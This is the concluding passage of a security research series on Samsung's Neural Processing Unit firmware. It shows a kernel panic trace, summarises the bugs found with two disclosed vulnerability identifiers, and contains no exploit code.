<4>[ 7717.707281] [2: npu-proto_AST:23209] show_stack+0x14/0x20
<4>[ 7717.707296] [2: npu-proto_AST:23209] dump_stack+0xd4/0x110
<4>[ 7717.707311] [2: npu-proto_AST:23209] panic+0x174/0x2dc
<4>[ 7717.707328] [2: npu-proto_AST:23209] __stack_chk_fail+0x18/0x1c
<4>[ 7717.707343] [2: npu-proto_AST:23209] nw_rslt_manager+0x2e0/0x2e4
<2>[ 7717.707365] [2: npu-proto_AST:23209] SMP: stopping secondary CPUs : SYSTEM_RUNNING
This short article concludes this series about Samsung's Neural Processing Unit implementation. This journey started from an opaque binary embedded inside Samsung's firmwares and ended with an in-depth understanding of this component as well as primitives that could be used in a privilege escalation exploit (although we're pretty far away from an actual LPE).
It's very likely that there are multiple bugs still lurking in the codebase of the NPU, especially in functions handling machine learning computations since they are pretty complex and handle a lot of user inputs. The lack of security mitigations also makes any exploitation trivial. Thankfully, the kernel does implement mitigations and has limited interactions with the NPU, which greatly reduces the chances of a successful kernel compromise from the NPU.
SVE-2021-20204
SVE-2021-21074
Copyright © Impalabs 2021-2023